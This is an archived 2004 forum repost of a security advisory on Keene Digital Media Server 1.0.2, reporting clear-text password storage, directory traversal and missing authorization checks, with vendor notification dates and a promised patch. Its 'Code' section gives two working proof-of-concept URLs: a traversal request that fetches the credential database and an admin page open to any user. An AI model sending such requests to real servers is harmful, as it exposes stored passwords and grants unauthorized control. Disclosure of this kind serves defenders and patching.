Keene Digital Media Server

Full Version: Keene Digital Media Server

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Aug 12 2004, 02:44 PM

QUOTE

Keene Digital Media Server Discloses Files and Passwords to Remote Authenticated Users

Application: Keene Digital Media Server
Web Site: http://www.keenesoftware.com/
Versions: 1.0.2
Platform: Windows
Bugs: 1) Clear Text Passwords .
2) Directory Traversal .
3) Authorization .

) Introduction
2) Bug
3) The Code
4) Fix

===============
1) Introduction
===============

Keene Digital Media Server is the easiest way to
share or view your library of digital pictures, music, videos or any computer files over the web.

=======
2) Bugs
=======

1)

Keene Digital Media Server stores usernames and passwords in clear text under :

\Program Files\Keene Software\Digital Media Server\dmscore.db

3)

Any authenticated user can Perform Administrative Tasks.

===========
3) The Code
===========

2) http://127.0.0.1:8080/dms/%2e%2e/%2e%2e/dmscore.db

3) http://127.0.0.1:8080/dms/adminusers.kspx

===========
4) The Fix
===========

Date of Vendor Notification:

04-08-04

Status:

08-08-04

This is being addressed in our next patch release, 1.0.4, which should be released in about a week or so.

Source: http://www.securitytracker.com/alerts/2004/Aug/1010928.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.